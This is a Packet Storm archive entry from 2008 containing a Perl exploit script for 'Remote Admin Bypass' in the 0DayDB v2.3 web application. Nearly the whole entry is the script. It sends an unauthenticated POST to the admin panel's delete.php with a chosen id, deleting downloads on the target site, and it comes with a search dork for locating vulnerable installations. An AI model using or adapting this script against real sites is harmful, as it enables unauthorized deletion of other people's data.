0DayDB-bypass.txt

2008-01-12T00:00:00
ID PACKETSTORM:62560
Type packetstorm
Reporter Pr0metheuS
Modified 2008-01-12T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#Autor : Pr0metheuS  
#Script : 0DayDB v2.3  
#Version : v2.3  
#Dork : "Powered By 0DayDB v2.3"  
#Gr33tz-Team.org  
use LWP::UserAgent;  
if(@ARGV!=3){  
print "*****************\n";  
print "0DayDB v2.3 Remote Admin Bypass\n";  
print "perl $0 <site> <path> <id>\n";  
print "downloads ID for delete\n";  
print "*****************\n";  
}  
($site,$path,$id)=@ARGV;  
sub pri {  
print "*****************\n";  
print "[+] Exploit completed\n";  
print "*****************";  
}  
sub con {  
$ua = new LWP::UserAgent;  
$ua->agent("Mozilla/8.0");  
$ua = LWP::UserAgent->new;  
my $req = HTTP::Request->new(POST => "".$site."".$path."/acp/delete.php");  
$req->content_type('application/x-www-form-urlencoded');  
$req->content("id=".$id."");  
$res = $ua->request($req);  
if ($res->is_success) {  
pri();  
}  
}  
con();  
  
`